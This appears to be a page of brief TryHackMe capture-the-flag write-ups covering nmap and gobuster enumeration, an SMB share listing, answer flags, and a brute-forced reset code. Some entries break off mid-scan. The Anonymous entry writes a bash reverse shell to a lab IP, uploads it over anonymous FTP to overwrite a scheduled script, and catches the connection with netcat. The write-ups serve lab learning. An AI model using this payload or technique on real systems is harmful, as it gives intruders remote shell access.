Nehru

 Tryhackme - Learning Cyber Security #2 - What is the username of the BookFace account you will be taking over?   Answer :- Ben.Spring #3 - Hack the BookFace account to reveal this tasks answer! step -1  enter the username and reset password .but we don't have email accounts.. step -2 ben will have to send an email with a  4 digit code ,but we dont have access to his email.   step - 3   step - 4   step - 5   step -6    step -7  we got the flag ..  ANSWER - THM{BRUTEFORCING}  #4 - How much did the data breach cost Target?     ANSWER - $300 MILLION

 Tryhackme - Anonymous NMAP - Network mapper #1 - Enumerate the machine. How many ports are open? # nmap -sC -vv -A 10.10.138.102 Nmap scan: ANSWER - 4 #2 - What service is running on port 21? ANSWER - ftp #3 - What service is running on ports 139 and 445? ANSWER - smb #4 - There’s a share on the user’s computer. What’s it called? #smbclient -L 10.10.138.102   ANSWER - pics #5 - user.txt   clean.sh #!/bin/bash bash -i >& /dev/tcp/10.8.192.14/4444 0>&1 Connect to the FTP server again: ftp 10.10.37.186 Anonymous cd scripts put clean.sh   Now set up a netcat listener on the specified port: #nc - nvlp 4444                                                        listening on [any] 4444 ... connect to [10.8.192.14] from (UNKNOWN) [10.10.138.102] 54700 bash: cannot set terminal process group (1399): Inappropriate ioctl for device bash: no job control in this shell namelessone@anonymous:~$ ls ls pics user.txt namelessone@anonymous:~$ cat user.txt cat user.txt 90d6f992585815ff99

 Tryhackme - LazyAdmin    NMAP - Network mapping  # command - nmap -sT -vv -sC -sV 10.10.126.215   PORT   STATE SERVICE REASON  VERSION 22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo0a0DBybd2oCUPGjhXN1BQrAhbKKJhN/PW2OCccDm6KB/+sH/2UWHy3kE1XDgWO2W3EEHVd6vf7SdrCt7sWhJSno/q1ICO6ZnHBCjyWcRMxojBvVtS4kOlzungcirIpPDxiDChZoy+ZdlC3hgnzS5ih/RstPbIy0uG7QI/K7wFzW7dqMlYw62CupjNHt/O16DlokjkzSdq9eyYwzef/CDRb5QnpkTX5iQcxyKiPzZVdX/W8pfP3VfLyd/cxBqvbtQcl3iT1n+QwL8+QArh01boMgWs6oIDxvPxvXoJ0Ts0pEQ2BFC9u7CgdvQz1p+VtuxdH6mu9YztRymXmXPKJfB |   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC8TzxsGQ1Xtyg+XwisNmDmdsHKumQYqiUbxqVd+E0E0TdRaeIkSGov/GKoXY00EX2izJSImiJtn0j988XBOTFE= |   256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519) |_ssh-ed25519 AAAAC

  Tryhackme - Brooklyn99 CTF   NMAP - network mapper  # nmap -sT -vv -sC -sV 10.10.254.255 PORT   STATE SERVICE REASON  VERSION 21/tcp open  ftp     syn-ack vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt | ftp-syst: |   STAT: | FTP server status: |      Connected to ::ffff:10.8.192.14 |      Logged in as ftp |      TYPE: ASCII |      No session bandwidth limit |      Session timeout in seconds is 300 |      Control connection is plain text |      Data connections will be plain text |      At session startup, client count was 3 |      vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linuxcol 2.0) | ssh-hostkey: |   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQjh/Ae6uYU+t7FWTpPoux5Pjv9zvlOLEMn4vD2pYTeHDbzv7ww75UaUzPtsC8kM1EPbMQn1BUCvTNkIxQ34zmw5FatZWNR8/De/u/9fXzHh3K3

  Tryhackme - battery NMAP # nmap -sT -vv -sC -sV 10.10.21.189  PORT   STATE SERVICE REASON  VERSION 22/tcp open  ssh     syn-ack OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   1024 14:6b:67:4c:1e:89:eb:cd:47:a2:40:6f:5f:5c:8c:c2 (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBAPe2PVDHBBlUCEtHNVxjToY/muZpZ4hrISDM7fuGOkh/Lp9gAwpEh24Y/u197WBDTihDJsDZJqrJEJSWbpiZgReyh1LtJTt3ag8GrUUDJCNx6lLUIWR5iukdpF7A2EvV4gFn7PqbmJmeeQRtB+vZJSp6VcjEG0wYOcRw2Z6N6ho3AAAAFQCg45+RiUGvOP0QLD6PPtrMfuzdQQAAAIEAxCPXZB4BiX72mJkKcVJPkqBkL3t+KkkbDCtICWi3d88rOqPAD3yRTKEsASHqSYfs6PrKBd50tVYgeL+ss9bP8liojOI7nP0WQzY2Zz+lfPa+d0uzGPcUk0Wg3EyLLrZXipUg0zhPjcXtxW9+/H1YlnIFoz8i/WWJCVaUTIR3JOoAAACBAMJ7OenvwoThUw9ynqpSoTPKYzYlM6OozdgU9d7R4XXgFXXLXrlL0Fb+w7TT4PwCQO1xJcWp5xJHi9QmXnkTvi386RQJRJyI9l5kM3E2TRWCpMMQVHya5L6PfWKf08RYGp0r3QkQKsG1WlvMxzLCRsnaVBqCLasgcabxY7w6e2EM |   2048 66:42:f7:91:e4:7b:c6:7e:47:17:c6:27:a7:bc:6e:73 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkDLTds2sLmn9AZ0KAl70Fu5gfx5T6MDJehrs

  tryhackme - wgel CTF   NMAP - network mapper first we are going to do is a general nmap (network mapper) scan so that we get to know how many ports are opened. # nmap -sT -vv -sC -sV <ip>   HTTP summary of nmap:- will see here 2 ports are open which are 80 and 22 . Port 22 is used to connect to SSH so with this help we got to know that we can connect through ssh and port 80 is for the HTTP that means it is hosting a website so lets run that IP in our browser.   gobuster  its look like an apache2 server then quick i got an idea of brute-forcing the website with some common extensions. so, to run a brute-force of extensions on website we use a tool called gobuster. command:- gobuster dir -u <site URL> -w <word list> -x <extn> root@:~# gobuster dir -u http://10.10.116.173/ -w /usr/share/wordlists/dirb/common.txt -t 25 -x php,html,txt -q  /index.html ( Status: 200 ) /index.html ( Status: 200 ) /server-status ( Status: 403 ) /sitemap ( Status: 301 )   so